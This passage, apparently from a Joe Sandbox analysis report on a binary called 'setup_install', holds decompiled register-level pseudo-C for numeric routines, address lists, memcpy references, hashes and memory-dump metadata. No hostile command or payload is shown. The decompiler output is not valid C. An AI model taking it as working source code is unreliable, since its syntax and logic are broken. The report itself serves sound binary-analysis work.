										__edx = __esp[0x20];
										__ebp = __esp[0x19];
										__ebx = __ebx + __ecx;
										__ebx = __ebx - __esp[0xb];
										__edx = __esp[0x20] - __ecx;
										__ebx = __ebx - __ebp;
										__ecx = __ebx - __ebp + __edx;
										__eflags = __ebp - __ebx;
										__edx =  >  ? __ebx - __ebp + __edx : __edx;
										__ebx = __esi + __edx;
										__ebp = __eax + __edx;
										__eflags = __ebx - __ebp;
										__eax = __ebp;
										__eax =  <=  ? __ebx : __ebp;
										__eflags = __esi - __eax;
										__eax =  <=  ? __esi : __eax;
										__eflags = __eax;
										if(__eax > 0) {
											__ebx = __ebx - __eax;
											__ebp = __ebp - __eax;
											__esi = __esi - __eax;
											__eflags = __esi;
										}
										__eax = __esp[0x12];
										__eflags = __eax;
										if(__eax != 0) {
											__esp[1] = __eax;
											__eax = __esp[8];
											 *__esp = __esp[8];
											__eax = E0041A980();
											__esp[1] = __edi;
											 *__esp = __eax;
											__esp[8] = __eax;
											__eax = E0041A810();
											 *__esp = __edi;
											__esp[0x13] = __eax;
											E0041A680() = __esp[0x13];
											__edi = __esp[0x13];
										}
										__ebx = __ebx - __esp[0xd];
										__eflags = __ebx;
										if(__eflags > 0) {
											__edi = E0041AB00(__edi, __ebx);
										} else {
											if(__eflags != 0) {
												__ebx =  ~__ebx;
												 *__esp = __edi;
												__esp[1] = __ebx;
												__eax = L00419F30();
											}
										}
										__eax = __esp[0x1c];
										__eflags = __esp[0x1c];
										if(__esp[0x1c] > 0) {
											__eax = __esp[0x1a];
											__esp[1] = __esp[0x1a];
											__eax = __esp[0xc];
											 *__esp = __esp[0xc];
											__esp[0xc] = E0041A980();
										}
										__eflags = __ebp;
										if(__ebp > 0) {
											__eax = __esp[0xc];
											__esp[0xc] = E0041AB00(__esp[0xc], __ebp);
										}
										__eflags = __esi;
										if(__esi > 0) {
											__eax = __esp[8];
											__esp[8] = E0041AB00(__esp[8], __esi);
										}
										__eax = __esp[0xc];
										 *__esp = __edi;
										__esp[1] = __esp[0xc];
										__eax = E0041AC70();
										__eflags =  *(__eax + 0x10) - 1;
										__ebp = __eax;
										if( *(__eax + 0x10) > 1) {
											L48:
											__eax = __esp[8];
											__ebx =  *(__ebp + 0xc);
											 *(__ebp + 0xc) = 0;
											__eax = E0041AC20(__ebp, __esp[8]);
											__esi = __esp[0x1b];
											__eflags = __esi;
											if(__esi == 0) {
												L63:
												__eflags = __eax;
												if(__eflags < 0) {
													__eflags = __ebx;
													if(__ebx != 0) {
														L157:
														__esp[0x2d] = 0x11;
														goto L84;
													}
													__eflags = __esp[0x10] - 1;
													__esp[0x2d] = 0x21;
													if(__esp[0x10] > 1) {
														goto L84;
													}
													__ebx = __esp[0x19];
													__eflags = __esp[0x22] - __esp[0x19];
													if(__esp[0x22] == __esp[0x19]) {
														goto L84;
													}
													__eflags = __esp[0xe] & 0x00000001;
													if((__esp[0xe] & 0x00000001) != 0) {
														goto L84;
													}
													__ebp = E0041AB00(__ebp, 1);
													__eax = __esp[8];
													__eax = E0041AC20(__ebp, __esp[8]);
													__eflags = __eax;
													if(__eax <= 0) {
														goto L113;
													}
													__esp[0x2d] = 0x11;
													__esp[0xe] = 0;
													L127:
													__eax = __esp[0xb];
													__esp[0x2f] = __esp[0x2f] - __eax;
													__esp[0x2e] = __eax;
													__esp[1] = __eax;
													__eax = __esp[0x31];
													 *__esp = __esp[0x31];
													__esp[0x31] = E00412AF0();
													goto L84;
												}
												if(__eflags == 0) {
													__eflags = __ebx;
													if(__ebx == 0) {
														__eflags = __esp[0x10] - 1;
														if(__esp[0x10] == 1) {
															__ebx = __esp[0x19];
															__eflags = __esp[0x22] - __esp[0x19];
															__esp[0x2d] = 1;
															if(__esp[0x22] != __esp[0x19]) {
																goto L127;
															}
															__eax = __esp[0x31];
															__esp[0x2d] = 0x21;
															__eflags =  *(__eax + 0x10) - 1;
															if( *(__eax + 0x10) == 1) {
																__eflags =  *(__eax + 0x14) - 1;
																__esp[0x10] =  !=  ? __esp[0x1e] : __esp[0x10];
																__esp[0x1e] =  !=  ? __esp[0x1e] : __esp[0x10];
															}
															goto L84;
														}
														__esp[0x2d] = 0x21;
														L148:
														__esi = __esp[0x10];
														__eflags = __esp[0xb] - __esp[0x10];
														if(__esp[0xb] <= __esp[0x10]) {
															L150:
															__eax = __esp[0x31];
															__eflags =  *(__eax + 0x14) & 0x00000001;
															if(( *(__eax + 0x14) & 0x00000001) == 0) {
																goto L84;
															}
															__eflags = __ebx;
															if(__ebx != 0) {
																__eax = E00412630(__eax);
																__ecx =  *(__eax + 0x10);
																__edx = __esp[0x2e];
																__esp[0x31] = __eax;
																asm("bsr eax, [eax+ecx*4+0x10]");
																__edx =  ~__edx;
																__ecx =  ~__edx & 0x0000001f;
																__eax = __eax ^ 0x0000001f;
																__eflags = ( ~__edx & 0x0000001f) - __eax;
																if(( ~__edx & 0x0000001f) != __eax) {
																	__edx = __edx + 1;
																	__eflags = __edx;
																	__esp[0x2e] = __edx;
																}
																__esp[0x2d] = 0x21;
																goto L84;
															}
															__eflags = __esp[0x10] - 1;
															if(__esp[0x10] == 1) {
																L144:
																 *(__eax + 0x10) = 0;
																__eax = __esp[0x19];
																__esp[0x2d] = 0x50;
																__esp[0x2f] = __esp[0x19];
																goto L84;
															}
															_t329 = __eax + 0x14; // 0x14
															__edx = _t329;
															__ecx = __edx + __eax * 4;
															while(1) {
																__eax =  *__edx;
																__eflags = __eax;
																if(__eax != 0) {
																	break;
																}
																__edx = __edx + 4;
																 *(__edx - 4) = 0xffffffff;
																__eflags = __ecx - __edx;
																if(__ecx <= __edx) {
																	goto L157;
																}
															}
															__eax = __eax - 1;
															__eflags = __eax;
															 *__edx = __eax;
															goto L157;
														}
														__eflags = __esp[0xe] & 0x00000001;
														if((__esp[0xe] & 0x00000001) == 0) {
															goto L113;
														}
														goto L150;
													}
													__eax = __esp[0xe];
													__eflags = __esp[0xe];
													if(__esp[0xe] == 0) {
														L158:
														__esp[0x2d] = 0x11;
														goto L148;
													}
													__ecx = __esp[0x2e];
													__esi = __esp[0x31];
													__eax = __ecx;
													_t291 = __esi + 0x14; // 0x14
													__edx = _t291;
													__eax = __ecx >> 5;
													__eax = __edx + (__ecx >> 5) * 4;
													__eflags = __edx - __eax;
													if(__edx >= __eax) {
														L135:
														__ecx = __ecx & 0x0000001f;
														__eflags = __ecx;
														if(__ecx == 0) {
															L137:
															__eax = __esp[0xb];
															__ebx = __esp[0x19];
															 *(__esi + 0x10) = 1;
															 *(__esi + 0x14) = 1;
															__esp[0x2e] = 1;
															__esp[0x2d] = 0x21;
															__eax = __esp[0xb] + __esp[0x19] - 1;
															__esp[0x2f] = __esp[0xb] + __esp[0x19] - 1;
															goto L114;
														}
														__eax = __eax | 0xffffffff;
														__eax = __eax << __cl;
														__eax = __eax |  *__edx;
														__eax = __eax + 1;
														__eflags = __eax;
														if(__eax != 0) {
															goto L158;
														}
														goto L137;
													}
													__eflags =  *(__esi + 0x14) - 0xffffffff;
													_t295 = __esi + 0x18; // 0x18
													__edx = _t295;
													if( *(__esi + 0x14) == 0xffffffff) {
														while(1) {
															__eflags = __edx - __eax;
															if(__edx >= __eax) {
																goto L135;
															}
															__edx = __edx + 4;
															__eflags =  *(__edx - 4) - 0xffffffff;
															if( *(__edx - 4) != 0xffffffff) {
																goto L158;
															}
														}
														goto L135;
													}
													goto L158;
												}
												__eax = __esp[8];
												__eax = E0041B160(__fp0, __ebp, __esp[8]);
												__fp0 =  *0x4a54e0;
												asm("fucomip st0, st1");
												if(__eflags < 0) {
													__fp0 =  *0x4a54e4;
													__eflags = __ebx - 1;
													asm("sbb eax, eax");
													__eax = __eax & 0x00000010;
													__eax = __eax + 0x10;
													__fp0 =  *0x4a54e4 * st0;
													asm("fxch st0, st1");
													__esp[0x21] = __eax;
													__eax = 0;
													__eflags = __ebx - 1;
													_t214 = __ebx - 1 > 0;
													__eflags = _t214;
													__eax = 0 | _t214;
													__esp[0x13] = _t214;
													asm("fst qword [esp+0x58]");
													__fp0 =  *0x4a54e8;
													asm("fucomip st0, st1");
													if(_t214 <= 0) {
														st0 = __fp0;
														st0 = __fp0;
														__fp0 = __esp[0x16];
														__esp[0x14] = 0;
														__esp[0x10] = __esp[0x16];
														L101:
														__esp[0xd] = 0;
														goto L53;
													}
													asm("fnstcw word [esp+0x96]");
													__eax = __esp[0x25] & 0x0000ffff;
													__esp[0x25] = __ax;
													__eax = __esp[0x1b];
													asm("fldcw word [esp+0x94]");
													asm("fist dword [esp+0x50]");
													asm("fldcw word [esp+0x96]");
													__eflags = __eax - 1;
													asm("fild dword [esp+0x50]");
													asm("fst qword [esp+0x40]");
													asm("fsubp st1, st0");
													asm("fst qword [esp+0x58]");
													if(__eax == 1) {
														st0 = __fp0;
														st0 = __fp0;
														__eax = __esp[0x13];
														__eflags = __esp[0x13];
														if(__eflags == 0) {
															goto L101;
														}
														L99:
														asm("fldz");
														__fp0 = __esp[0x16];
														asm("fucomip st0, st1");
														st0 = __fp0;
														if(__eflags <= 0) {
															goto L101;
														}
														L100:
														__esp[0x14] = __esp[0x14] + 1;
														0x30 = 0x30 - __esp[0x21];
														__eflags = 0x30;
														asm("fild dword [esp+0x50]");
														__esp[0x21] = 0x30 - __esp[0x21];
														__esp[0x10] = __fp0;
														goto L101;
													}
													__eflags = __eax - 2;
													if(__eflags != 0) {
														asm("fucomip st0, st1");
														st0 = __fp0;
														if(__eflags >= 0) {
															goto L100;
														}
														goto L101;
													}
													st0 = __fp0;
													st0 = __fp0;
													__eax = __esp[0x13];
													__eflags = __esp[0x13];
													if(__eflags != 0) {
														goto L101;
													}
													goto L99;
												}
												st0 = __fp0;
												__eflags = __ebx;
												if(__ebx != 0) {
													asm("fld1");
													__esp[0x14] = 0;
													__esp[0x21] = 0x20;
													__esp[0xd] = 0;
													__esp[0x13] = 0;
													asm("fst qword [esp+0x40]");
													__esp[0x16] = __fp0;
													goto L53;
												}
												__esp[0xd] = 0;
												L68:
												__eflags = __esp[0x10] - 1;
												if(__esp[0x10] > 1) {
													L70:
													asm("fld1");
													__esp[0x14] = 0;
													__esp[0x21] = 0x10;
													__esp[0x13] = 1;
													asm("fst qword [esp+0x40]");
													__esp[0x16] = __fp0;
													goto L53;
												}
												__eflags = __esp[0xe] & 0x00000001;
												if((__esp[0xe] & 0x00000001) != 0) {
													__eax = __esp[0x31];
													__esp[0xe] = 1;
													goto L144;
												}
												goto L70;
											}
											__eflags = __eax;
											if(__eax > 0) {
												goto L63;
											}
											__eax = __esi;
											__eax = __esi & 0x00000001;
											__eax = __eax ^ __ebx;
											__eflags = __eax - __ebx;
											__esp[0xd] = __eax ^ __ebx;
											if(__eax == __ebx) {
												__eflags = __eax - 1;
												asm("sbb eax, eax");
												__eax = __eax & 0x00000010;
												__esp[0x2d] = __eax;
												goto L84;
											}
											__eflags = __ebx;
											if(__ebx == 0) {
												__esi = __esp[0x19];
												__eflags = __esp[0x22] - __esp[0x19];
												__esp[0x2d] = 0x11;
												if(__esp[0x22] == __esp[0x19]) {
													goto L68;
												}
												__edx = __esp[0xb];
												__eax = __esp[0x31];
												__eflags = __edx - 0x1f;
												if(__edx <= 0x1f) {
													__esi = __esp[0xb];
													L81:
													__eflags = __esi - 1;
													if(__esi <= 1) {
														L83:
														__ebx = __esp[0xb];
														__edx = __esp[0x22];
														 *__esp = __eax;
														__edx = __esp[0x22] - 1;
														__eflags = __edx;
														__esp[1] = __ebx;
														__esp[0x2e] = __ebx;
														__esp[0x2f] = __edx;
														__esp[0x31] = E00412AF0();
														goto L84;
													}
													_t179 = __ebx * 4; // 0x14
													__ebx = __eax + _t179 + 0x14;
													__ecx = 0;
													__esi = __esi - 1;
													__edx =  *__ebx;
													asm("repe bsf ecx, edx");
													__edx =  *__ebx >> __cl;
													__eflags = __esi;
													 *__ebx =  *__ebx >> __cl;
													if(__esi > 0) {
														goto L68;
													}
													goto L83;
												}
												__ecx =  *(__eax + 0x14);
												__eflags =  *(__eax + 0x14);
												if( *(__eax + 0x14) != 0) {
													goto L68;
												}
												__ecx = __esp[0x23];
												__esi = __ecx;
												while(1) {
													__edx = __edx - 0x20;
													__ebx = __ebx + 1;
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L81;
													}
													__eflags =  *(__eax + 0x14 + __ebx * 4);
													if( *(__eax + 0x14 + __ebx * 4) != 0) {
														goto L68;
													}
												}
												goto L81;
											}
											asm("fld1");
											__esp[0x2d] = 0x21;
											__esp[0x14] = 0;
											__esp[0x21] = 0x20;
											__esp[0x13] = 0;
											asm("fst qword [esp+0x40]");
											__esp[0x16] = __fp0;
											goto L53;
										} else {
											__ebx =  *(__eax + 0x14);
											__eflags =  *(__eax + 0x14);
											if( *(__eax + 0x14) == 0) {
												goto L84;
											}
											goto L48;
										}
									}
									__eax = __esp[0x14];
									__eflags = __esp[0x14];
									if(__eflags == 0) {
										goto L30;
									}
									__esp[0x10] = __esp[0x10] *  *0x4a54f0;
									__esp[0x16] = st0;
									__fp0 = st0 -  *0x4a54e4;
									__fp0 = st2;
									asm("fchs");
									asm("fucomip st0, st1");
									if(__eflags <= 0) {
										st1 = __fp0;
										asm("fucomip st0, st1");
										if(__eflags <= 0) {
											st0 = __fp0;
											goto L30;
										}
										asm("fsubr dword [0x4a54dc]");
										__fp0 = __esp[0x16];
										asm("fxch st0, st1");
										asm("fucomip st0, st1");
										st0 = __fp0;
										if(__eflags <= 0) {
											goto L30;
										}
										L104:
										__eax = __esp[0x21];
										__esp[0x2d] = __esp[0x2d] | __esp[0x21];
										goto L84;
									}
									st0 = __fp0;
									asm("fucomip st0, st1");
									st0 = __fp0;
									if(__eflags > 0) {
										goto L104;
									}
									goto L30;
								}
								__edx = __edx + 3;
								asm("bsr ecx, [eax+edx*4+0x4]");
								asm("bsr edx, [ebx+edx*4+0x4]");
								__ecx = __ecx ^ 0x0000001f;
								__edx = __edx ^ 0x0000001f;
								__eflags = __edx - __ecx;
								if(__edx <= __ecx) {
									goto L23;
								}
								goto L61;
							}
							L53:
							__eax = __esp[0x2e];
							__esp[0x2f] = __esp[0x2f] + __eax;
							__eflags = __eax - __esp[0xb];
							__esp[0x15] = __esp[0x2f] + __eax;
						} while (__eax >= __esp[0xb]);
						__eflags = __esp[0xe] & 0x00000001;
					} while ((__esp[0xe] & 0x00000001) != 0);
				}
			}

0x00414070
0x00414070
0x00414074
0x00414076
0x00414078
0x00414086
0x0041408b
0x00414092
0x00414099
0x004140a0
0x00413bc0
0x00413bc0
0x00413bc0
0x00413bc0
0x00413bc7
0x00413bcb
0x00413bcf
0x00413be2
0x00413be4
0x00413beb
0x00413bed
0x00414053
0x00414055
0x00414058
0x0041405c
0x00413bf3
0x00413bf3
0x00413c01
0x00413c01
0x00413bf3
0x00413c03
0x00413c07
0x00413c0e
0x00413c12
0x00413c14
0x00413c17
0x00413873
0x00413878
0x0041387c
0x00413883
0x00413885
0x00000000
0x00000000
0x00413887
0x0041388a
0x0041388d
0x00413890
0x004138a9
0x004138a9
0x004138ad
0x004138b4
0x00413d2d
0x00413d32
0x00413d35
0x00413d3c
0x00413d44
0x00413d44
0x00413d44
0x00000000
0x00413d51
0x004138ba
0x004138be
0x004138be
0x004138be
0x004138c6
0x00000000
0x004138c6
0x00413892
0x00413895
0x0041389a
0x0041389f
0x004138a2
0x004138a5
0x004138a7
0x00000000
0x00000000
0x00000000
0x00413c1d
0x00413c1d
0x00413c22
0x00413c25
0x00413c2c
0x00413c2f
0x00413c32
0x00413c4f
0x00413c4f
0x00413c53
0x00413c55
0x004140f2
0x004140fa
0x004140fd
0x00414102
0x0041410a
0x00414112
0x00413c5b
0x00413c5b
0x00413c62
0x00413c65
0x00413c69
0x00413c73
0x00413c76
0x00413c76
0x004138d0
0x004138db
0x004138e0
0x004138e4
0x004138e6
0x00413e34
0x00413e34
0x00413e38
0x00413e3a
0x00414150
0x00414150
0x00414157
0x0041415b
0x0041415b
0x0041415f
0x00414163
0x00414166
0x0041416a
0x00000000
0x00000000
0x00414170
0x00414177
0x00414573
0x00414577
0x0041457a
0x0041457c
0x00414580
0x0041417d
0x0041417d
0x0041418d
0x0041418d
0x00414194
0x0041419b
0x0041419f
0x004141a7
0x00413e47
0x00413e47
0x00413e4e
0x00413e58
0x00413e64
0x00413e70
0x00413e7f
0x00413e84
0x00413e8b
0x00413e92
0x00413e95
0x004137a2
0x004137a2
0x004137a6
0x004137ad
0x004137af
0x004137b5
0x004137b9
0x004137bb
0x004137bd
0x004133d5
0x004133dc
0x004133e7
0x004133ec
0x004133f2
0x004137c3
0x004137c3
0x004137ca
0x004137cd
0x004137cf
0x004137d2
0x004137d5
0x004137d7
0x004137d9
0x004137d9
0x004137d9
0x004137dc
0x004137de
0x00413060
0x00413060
0x00413063
0x0041306a
0x0041306f
0x00413075
0x004137e4
0x004137e4
0x004137e4
0x004137de
0x004137bd
0x00412fd1
0x00412fd8
0x00412fda
0x00412fdc
0x00412fe3
0x00412fea
0x00412fea
0x00412fec
0x00412ff0
0x00412ff2
0x00412ff4
0x00412ff4
0x00412ff4
0x00412ff4
0x00412ffc
0x00412ffe
0x00413004
0x00413008
0x0041300c
0x00413010
0x00413017
0x0041301f
0x00413029
0x00413029
0x00412c1c
0x00412c1c
0x00413e9b
0x00413e9e
0x00413ea2
0x00413ea5
0x00413ea8
0x00414463
0x00414467
0x00414469
0x00413768
0x00413768
0x0041376f
0x0041377a
0x00413781
0x00413786
0x0041378c
0x00413793
0x0041379a
0x0041379d
0x0041379d
0x004137a0
0x00000000
0x004137a0
0x00413ec0
0x00413eca
0x00413ecf
0x00413ed6
0x00413edd
0x00413ee8
0x00413ef3
0x00413ef6
0x00413ef8
0x00413eff
0x00413f06
0x00413f08
0x00413f0b
0x00413f0e
0x00413f11
0x00413f13
0x00413f15
0x00413f2e
0x00413f2e
0x00413f2e
0x00413f31
0x00413f3c
0x00413f3e
0x00413f40
0x00413f40
0x00000000
0x00413f31
0x00413f20
0x00413f20
0x00413f23
0x00413f2a
0x00413f2a
0x00000000
0x00413f20
0x00413eae
0x00413eb1
0x00414452
0x00414456
0x00414458
0x00000000
0x00000000
0x00000000
0x0041445e
0x00413eb7
0x00413eba
0x00000000
0x00000000
0x00000000
0x00413eba
0x00413e40
0x00413e40
0x00000000
0x00413e40
0x004138f3
0x004138fa
0x004138fe
0x00413942
0x00413942
0x00413946
0x00413948
0x00413d59
0x00413d59
0x00413d63
0x00413d68
0x00413d70
0x00413d70
0x00413956
0x00413962
0x00413971
0x00413976
0x0041397a
0x00413980
0x00413985
0x00413988
0x0041398c
0x00413993
0x00413996
0x0041399d
0x004139a1
0x004139a5
0x004139b1
0x004139bc
0x004139be
0x004139c5
0x004139c5
0x004139c8
0x004139cb
0x004139ce
0x004139d1
0x004139dc
0x004139e0
0x004139e5
0x004139e9
0x004139f0
0x004139f7
0x004139f9
0x00413a00
0x00413a04
0x00413a06
0x00413a0b
0x00413a0d
0x00413a11
0x00413d13
0x00413d17
0x00413d1b
0x00413a17
0x00413a17
0x00413a1b
0x00413a1e
0x00413a1e
0x00413a22
0x00413a26
0x00413a2d
0x00413a31
0x00413a33
0x00413a37
0x00413a3b
0x00413a3d
0x00413a3f
0x00413a41
0x00413a44
0x00413a47
0x00413a4a
0x00413a4c
0x00413a4e
0x00413a51
0x00413a53
0x00413a56
0x00413a58
0x00413a5a
0x00413a5c
0x00413a5e
0x00413a5e
0x00413a5e
0x00413a60
0x00413a64
0x00413a66
0x00413a68
0x00413a6c
0x00413a70
0x00413a73
0x00413a78
0x00413a7c
0x00413a7f
0x00413a83
0x00413a88
0x00413a8b
0x00413a94
0x00413a98
0x00413a98
0x00413a9a
0x00413a9e
0x00413aa1
0x00413d0c
0x00413aa7
0x00413aa7
0x00414120
0x00414122
0x00414125
0x00414129
0x00414129
0x00413aa7
0x00413aad
0x00413ab1
0x00413ab3
0x00413ab5
0x00413ab9
0x00413abd
0x00413ac1
0x00413ac9
0x00413ac9
0x00413acd
0x00413acf
0x00413ad1
0x00413ae1
0x00413ae1
0x00413ae5
0x00413ae7
0x00413ae9
0x00413af9
0x00413af9
0x00413afd
0x00413b01
0x00413b04
0x00413b08
0x00413b0d
0x00413b11
0x00413b13
0x00413b20
0x00413b20
0x00413b24
0x00413b27
0x00413b35
0x00413b3a
0x00413b3e
0x00413b40
0x00413c80
0x00413c80
0x00413c82
0x00414301
0x00414303
0x00414628
0x00414628
0x00000000
0x00414628
0x00414309
0x0041430e
0x00414319
0x00000000
0x00000000
0x0041431f
0x00414323
0x0041432a
0x00000000
0x00000000
0x00414330
0x00414335
0x00000000
0x00000000
0x0041434b
0x0041434d
0x00414358
0x0041435d
0x0041435f
0x00000000
0x00000000
0x00414365
0x00414370
0x00414378
0x00414378
0x0041437c
0x00414383
0x0041438a
0x0041438e
0x00414395
0x0041439d
0x00000000
0x0041439d
0x00413c88
0x004143a9
0x004143ab
0x004145b5
0x004145ba
0x00414645
0x00414649
0x00414650
0x0041465b
0x00000000
0x00000000
0x00414661
0x00414668
0x00414673
0x00414677
0x0041467d
0x00414685
0x0041468a
0x0041468a
0x00000000
0x00414677
0x004145c0
0x004145cb
0x004145cb
0x004145cf
0x004145d3
0x004145e0
0x004145e0
0x004145e7
0x004145eb
0x00000000
0x00000000
0x004145f1
0x004145f3
0x0041469d
0x004146a2
0x004146a5
0x004146ac
0x004146b3
0x004146ba
0x004146bc
0x004146bf
0x004146c2
0x004146c4
0x004146c6
0x004146c6
0x004146c9
0x004146c9
0x004146d0
0x00000000
0x004146d0
0x004145f9
0x004145fe
0x00414551
0x00414551
0x00414558
0x0041455c
0x00414567
0x00000000
0x00414567
0x00414604
0x00414604
0x0041460a
0x0041461d
0x0041461d
0x0041461f
0x00414621
0x00000000
0x00000000
0x0041460f
0x00414612
0x00414619
0x0041461b
0x00000000
0x00000000
0x0041461b
0x00414623
0x00414623
0x00414626
0x00000000
0x00414626
0x004145d5
0x004145da
0x00000000
0x00000000
0x00000000
0x004145da
0x004143b1
0x004143b5
0x004143b7
0x00414638
0x00414638
0x00000000
0x00414638
0x004143bd
0x004143c4
0x004143cb
0x004143cd
0x004143cd
0x004143d0
0x004143d3
0x004143d6
0x004143d8
0x00414401
0x00414401
0x00414401
0x00414404
0x00414416
0x00414416
0x0041441a
0x0041441e
0x00414425
0x0041442c
0x00414437
0x00414442
0x00414446
0x00000000
0x00414446
0x00414406
0x00414409
0x0041440b
0x0041440d
0x0041440d
0x00414410
0x00000000
0x00000000
0x00000000
0x00414410
0x004143da
0x004143de
0x004143de
0x004143e1
0x004143fd
0x004143fd
0x004143ff
0x00000000
0x00000000
0x004143f0
0x004143f3
0x004143f7
0x00000000
0x00000000
0x004143f7
0x00000000
0x004143fd
0x00000000
0x004143e3
0x00413c8e
0x00413c99
0x00413c9e
0x00413ca4
0x00413ca6
0x00413f50
0x00413f56
0x00413f59
0x00413f5b
0x00413f5e
0x00413f61
0x00413f63
0x00413f65
0x00413f6c
0x00413f6e
0x00413f71
0x00413f71
0x00413f71
0x00413f74
0x00413f78
0x00413f7c
0x00413f82
0x00413f84
0x004140a5
0x004140a7
0x004140a9
0x004140ad
0x004140b5
0x00414011
0x00414011
0x00000000
0x00414011
0x00413f8a
0x00413f91
0x00413f9b
0x00413fa3
0x00413fa7
0x00413fae
0x00413fb2
0x00413fb9
0x00413fbc
0x00413fc0
0x00413fc4
0x00413fc6
0x00413fca
0x004141c0
0x004141c2
0x004141c4
0x004141c8
0x004141ca
0x00000000
0x00000000
0x00413fe5
0x00413fe5
0x00413fe7
0x00413feb
0x00413fed
0x00413fef
0x00000000
0x00000000
0x00413ff1
0x00413ff1
0x00413ffb
0x00413ffb
0x00414002
0x00414006
0x0041400d
0x00000000
0x0041400d
0x00413fd0
0x00413fd3
0x00414133
0x00414135
0x00414137
0x00000000
0x00000000
0x00000000
0x0041413d
0x00413fd9
0x00413fdb
0x00413fdd
0x00413fe1
0x00413fe3
0x00000000
0x00000000
0x00000000
0x00413fe3
0x00413cac
0x00413cae
0x00413cb0
0x004140c0
0x004140c2
0x004140ca
0x004140d5
0x004140dd
0x004140e5
0x004140e9
0x00000000
0x004140e9
0x00413cb6
0x00413cbe
0x00413cbe
0x00413cc3
0x00413cd0
0x00413cd0
0x00413cd2
0x00413cda
0x00413ce5
0x00413ced
0x00413cf1
0x00000000
0x00413cf1
0x00413cc5
0x00413cca
0x00414542
0x00414549
0x00000000
0x00414549
0x00000000
0x00413cca
0x00413b46
0x00413b48
0x00000000
0x00000000
0x00413b4e
0x00413b50
0x00413b55
0x00413b57
0x00413b59
0x00413b5d
0x004142ea
0x004142ed
0x004142ef
0x004142f5
0x00000000
0x004142f5
0x00413b63
0x00413b65
0x00413d80
0x00413d84
0x00413d8b
0x00413d96
0x00000000
0x00000000
0x00413d9c
0x00413da0
0x00413da7
0x00413daa
0x00414539
0x00413de5
0x00413de5
0x00413de8
0x00413e05
0x00413e05
0x00413e09
0x00413e10
0x00413e13
0x00413e13
0x00413e16
0x00413e1a
0x00413e21
0x00413e2d
0x00000000
0x00413e2d
0x00413dea
0x00413dea
0x00413dee
0x00413df0
0x00413df3
0x00413df5
0x00413df9
0x00413dfb
0x00413dfd
0x00413dff
0x00000000
0x00000000
0x00000000
0x00413dff
0x00413db0
0x00413db3
0x00413db5
0x00000000
0x00000000
0x00413dbb
0x00413dc2
0x00413ddb
0x00413ddb
0x00413dde
0x00413de1
0x00413de3
0x00000000
0x00000000
0x00413dd0
0x00413dd5
0x00000000
0x00000000
0x00413dd5
0x00000000
0x00413ddb
0x00413b6b
0x00413b6d
0x00413b78
0x00413b80
0x00413b8b
0x00413b93
0x00413b97
0x00000000
0x00413b15
0x00413b15
0x00413b18
0x00413b1a
0x00000000
0x00000000
0x00000000
0x00413b1a
0x00413b13
0x00413900
0x00413904
0x00413906
0x00000000
0x00000000
0x0041390c
0x00413916
0x00413918
0x0041391e
0x00413920
0x00413922
0x00413924
0x00414020
0x00414022
0x00414024
0x00413940
0x00000000
0x00413940
0x0041402a
0x00414030
0x00414034
0x00414036
0x00414038
0x0041403a
0x00000000
0x00000000
0x00414040
0x00414040
0x00414047
0x00000000
0x00414047
0x0041392a
0x0041392c
0x0041392e
0x00413930
0x00000000
0x00000000
0x00000000
0x00413936
0x00413c34
0x00413c37
0x00413c3c
0x00413c41
0x00413c44
0x00413c47
0x00413c49
0x00000000
0x00000000
0x00000000
0x00413c49
0x00413b9b
0x00413b9b
0x00413ba9
0x00413bab
0x00413baf
0x00413baf
0x00413bb5
0x00413bb5
0x00413bc0

APIs

memcpy.MSVCRT ref: 004139A5
memcpy.MSVCRT ref: 004139E0

Strings

!, xrefs: 00413B6D
, xrefs: 00413B80

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memcpy
String ID: $!
API String ID: 3510742995-2056089098
Opcode ID: 4baf1409ddcc842ea5b0b2cb6e4a8cee8fc2296b9021324f51682b8313f043e2
Instruction ID: baef4da26f4d588924cded00a3f7debb0785163ca881c0660e105708aa9d911a
Opcode Fuzzy Hash: 4baf1409ddcc842ea5b0b2cb6e4a8cee8fc2296b9021324f51682b8313f043e2
Instruction Fuzzy Hash: 58B1F7B06093418FC720EF29C58469BBBE1BF88754F05892EE9C487311E778E994CB87

Uniqueness

Uniqueness Score: -1.00%

Function 00413939, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 241
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00413939(void* __edi, void* __fp0) {
				void* _t357;

				while(1) {
					L29:
					st0 = __fp0;
					while(1) {
						L30:
						__eax = __esp[0xe];
						__eflags = __esp[0xe];
						if(__esp[0xe] == 0) {
							goto L74;
						}
						L31:
						E0041A680(__edi) = __esp[0xc];
						E0041A680(__esp[0xc]) = __esp[8];
						E0041A680(__esp[8]) = E0041A680(__ebp);
						__edi = __esp[0x1d];
						__eax =  *(__edi + 4);
						__eax = E0041A5B0( *(__edi + 4));
						__edx =  *(__edi + 0x10);
						__edi = __esp[0x1f];
						__esp[0xc] = __eax;
						 *__esp = __eax;
						__edx = 8 + __edx * 4;
						__esp[1] = __esp[0x1f];
						__esp[2] = __edx;
						__eax = memcpy(??, ??, ??);
						__esp[0x31] =  *(__esp[0x31] + 4);
						__edi = E0041A5B0( *(__esp[0x31] + 4));
						__eax = __esp[0x31];
						_t63 = __edi + 0xc; // 0xc
						__edx = _t63;
						__ecx =  *(__eax + 0x10);
						__eax = __eax + 0xc;
						 *__esp = _t63;
						__esp[1] = __eax;
						__esp[2] = __ecx;
						__eax = memcpy(??, ??, ??);
						__eax = __esp[0xd];
						__esi = __esp[0x2e];
						 *__esp = 1;
						__esi = __esp[0x2e] - __eax;
						__eax = __eax + __esp[0x2f];
						__esp[0x10] = __esi;
						__ebx = __eax;
						__eax = E0041A7E0();
						__eflags = __ebx;
						__esp[8] = __eax;
						if(__ebx < 0) {
